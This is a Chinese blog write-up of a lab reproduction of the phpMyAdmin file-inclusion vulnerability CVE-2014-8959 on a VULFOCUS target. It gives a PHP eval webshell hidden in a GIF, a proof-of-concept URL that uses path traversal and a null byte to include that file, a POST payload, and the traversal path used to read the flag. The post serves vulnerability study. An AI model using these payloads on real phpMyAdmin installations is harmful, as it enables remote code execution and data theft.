【文件包含】phpmyadmin 文件包含(CVE-2014-8959)

最新推荐文章于 2024-01-02 09:58:12 发布
最新推荐文章于 2024-01-02 09:58:12 发布
阅读量472 收藏 3
点赞数
分类专栏: 漏洞库 文件包含 文章标签: 安全 网络 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wj33333/article/details/134422072
版权
本文详细描述了phpMyAdmin中的CVE-2014-8959漏洞,涉及文件包含逻辑漏洞,可被利用进行远程文件包含。利用方法包括基础环境设置、PoC构造和深度利用过程。建议用户及时升级或打补丁以修复这一高危漏洞。
摘要由CSDN通过智能技术生成

1.1漏洞描述

漏洞编号CVE-2014-8959
漏洞类型文件包含
漏洞等级高危
漏洞环境Windows
漏洞名称phpmyadmin 文件包含(CVE-2014-8959)

描述: phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。 访问http://ip:port/pma即可进入phpmyadmin。http://ip:port/下有测试账号密码,包含根目录下1.gif,其内容为:<?php@eval($_POST[a]);?>  

1.2漏洞等级

高危

1.3影响版本

phpMyAdmin

1.4漏洞复现

1.4.1.基础环境

靶场VULFOCUS
工具BurpSuite

1.4.2.前提

  • 网站后台地址:/pma

  • 后台管理账密:pmatest/pmatest 

1.5深度利用

1.5.1 漏洞点

POC:

http://ip:port/pma/gis_data_editor.php?token=4320dfa8b951d131f1a71891bbb2edbd&&gis_data[gis_type]=/../../../../1.gif%00

(使用自己拦截到的token)

post提交:

a=phpinfo();

查看/tmp/flag

/../../../../../../../../../../tmp/flag%00

拿到flag

flag-{bmh73c07be5-156d-47eb-ab2d-9a3e93cc53f4}

1.6漏洞挖掘

1.6.1指纹信息

1.7修复建议

  • 升级

  • 打补丁

  • 上设备

wj33333
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
phpmyadmin 文件包含CVE-2014-8959
千寻的博客
03-07 1763
- CNNVD编号:`CNNVD-201411-417 ` - 危害等级:` 中危 ` - CVE编号:` CVE-2014-8959 ` - 漏洞类型: `路径遍历 ` - 发布时间:` 2014-11-24 ` - 威胁类型: `远程 `
phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)
Au
10-21 2892
phpMyAdmin4.0.3 下载地址http://pan.baidu.com/s/1dEYo9zj 利用条件: 1.登录phpmyadmin后台 2.需要截断   满足第二个条件  php版本必须 &lt;5.3.4      搭建环境 我们在www目录下放置phpinfo.txt 和 phpadmin4.0.3   POC:http://localhost/...
phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)-附件资源
03-02
phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)-附件资源
phpmyadmin-文件包含(CVE-2014-8959)
最新发布
m0_65150886的博客
01-02 563
其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。用户名密码登陆pmatest/pmatest (phpMyAdmin)1.已知MySQL用户名和密码登录到phpmyadmin。3、包含根目录下1.gif等恶意文件。2.需要截断漏洞配合才能任意包含。构造URL,成功执行文件包含。1.访问ip:port。
【漏洞复现-phpmyadmin-文件包含CVE-2014-8959
10-14 2701
phpmyadmin-文件包含】鸡肋
Phpmyadmin后台代码执行CVE-2016-5734_poc
09-30
Phpmyadmin后台代码执行CVE-2016-5734_poc CVE-2016-5734在exploit-db上也就是 phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ,意即phpMyAdmin认证用户的远程代码执行,根据描述可知受影响的phpMyAdmin...
phpmyadmin 远程文件包含漏洞(CVE-2018-12613) - tdcoming'blog QQ group 906
08-04
漏洞背景背景介绍phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具…阅读数 156博文CVE-2018-12613 --- 本地文件包含造成
CVE-2014-8959 phpmyadmin 文件包含漏洞
weixin_51559599的博客
11-15 206
是空字节,它可以用来绕过一些字符串处理函数和文件检查。
[CVE-2014-8959] phpmyadmin任意文件包含漏洞分析(图文)
ai_64的博客
05-09 2084
0x01 漏洞描述 phpmyadmin是一款应用非常广泛的mysql数据库管理软件,基于PHP开发,这个漏洞有些年头了,看离别歌大佬的博文,感觉有点意思,找来实践一下。 任意文件包含漏洞(CVE-2014-8959)影响版本为4.0.1-4.2.12: 0x02 补丁分析 在文件libraries/gis/pma_gis_factory.php中对$type_lower多加了个判断。 作者...
vulfocus——solr远程命令执行(CVE-2019-17558)
m0_62063669的博客
09-11 842
Apache Solr 5.0.0版本至8.3.1版本中存在输入验证错误漏洞。攻击者可借助自定义的Velocity模板功能,利用Velocity-SSTI漏洞在Solr系统上执行任意代码。Velocity是一个基于Java的模板引擎,可以通过特定的语法获取在java对象的数据,填充到模板中,从而实现界面和java代码的分离。2.访问页面默认会有一个叫demo的core。4.注入Velocity模板即可执行任意命令。
渗透测试-PhpMyAdmin后台文件包含漏洞
道阻且长,行则将至。
08-10 6309
漏洞背景 背景介绍 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。 实训目标 1、了解此漏洞形成的原因; 2、掌握此漏洞的利用方式。 解题方向 根据漏洞编号找到相关知识。 攻击过程 墨者学院在线靶机:http://219.153.49.228:49400/index.php 直接...
vulhub-phpmyadmin
bqnagus
10-02 351
vulhub-phpmyadmin复现
[CVE-2014-8959] phpmyadmin任意文件包含漏洞分析
weixin_30887919的博客
12-18 453
0x01 漏洞描述 phpmyadmin是一款应用非常广泛的mysql数据库管理软件,基于PHP开发。 最新的CVE-2014-8959公告中,提到该程序多个版本存在任意文件包含漏洞,影响版本如下: phpMyAdmin 4.0.1 - 4.0.10.6 4.1.1 - 4.1.14.7 4.2.1 - 4.2.12 0x02 补丁分析 看到bobao.360.cn上提到了这个...
phpMyAdmin 4.8.1 远程文件包含 CVE-2018-12613 漏洞复现
Senimo
12-11 1471
漏洞复现 phpMyAdmin 4.8.1 远程文件包含 CVE-2018-12613 APP:phpMyAdmin 4.8.1 CVECVE-2018-12613 类型:远程文件包含 下载phpMyAdmin 4.8.1源码 漏洞问题出现在index.php页面55~63: // If we have a valid target, let's load that script instead if (! empty($_REQUEST['target']) && is_str
phpmyadmin漏洞_方兴未艾第3期 | phpMyAdmin文件包含漏洞
weixin_39884144的博客
11-30 193
phpMyAdmin文件包含漏洞Created 2020-07-22|Updated 2020-07-2201前言1.1CVE-2018-12613(phpMyAdmin文件包含漏洞)phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含漏洞,通过二次编码即可绕过检查1.2文件包含漏洞文件包含漏洞分为 本地文件包含(LFI) 和 ...
phpMyAdmin远程文件包含漏洞CVE-2018-12613深度分析
"phpmyadmin 远程文件包含漏洞(CVE-2018-12613)" 本文将详细解析PHPMyAdmin中的远程文件包含漏洞(CVE-2018-12613),这是一个严重影响该开源MySQL数据库管理工具安全性的漏洞。PHPMyAdmin是一个广受欢迎的Web...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值